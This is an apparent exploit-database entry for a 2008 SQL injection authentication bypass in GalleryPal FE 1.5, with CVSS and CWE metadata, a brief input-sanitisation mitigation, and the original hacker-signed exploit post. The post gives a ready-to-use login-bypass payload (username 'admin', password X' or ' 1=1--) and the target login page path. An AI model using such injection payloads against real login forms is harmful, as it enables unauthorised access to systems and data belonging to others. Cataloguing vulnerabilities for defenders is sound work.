header-logo
Suggest Exploit
vendor:
GalleryPal FE
by:
R3d-D3v!L
7.5
CVSS
HIGH
Remote SQL Injection Vulnerability
89
CWE
Product Name: GalleryPal FE
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

GalleryPal FE v1.5(Auth Bypass)

A user can bypass authentication by using the username 'admin' and the password 'X' or '1=1--'

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries
Source

Exploit-DB raw data:

------------------------------------------------------------
[~] GalleryPal FE v1.5(Auth Bypass)

[~]TYPE:Remote SQL Injection Vulnerability

[~] ----------------------------------------------------------

[~] author: R3d-D3v!L

[~]

[~] Date: 15.11.2008

[~]

[~] Home: www.ahacker.net

[~]

[~] contact: N/A

[~]

[~] -----------------------------------------------------------


ALERT FR0M THE DARKNESS BY 7h3 REd-D3v!L

[~] Exploit:



[*] username : admin


[*] password : X' or ' 1=1--

[*] demo:

[*] server/GalleryPal_FE_Demo/login.asp



[~] spechial thanks : ((dolly)) & ((7am3m)) & ((magoush_1987)) & (DEV!L_MODE) & ((0R45hy)) & {0}-{n-c-A}-{0}

[~]

[?] 4.!.S ---> ((R3d D?v!L))--JuPA--M2Z --d3v!L-Ro07

[~]

[~] www.xp10.me

[~]

[~]I4M:4r48!4N-3XPLO!73r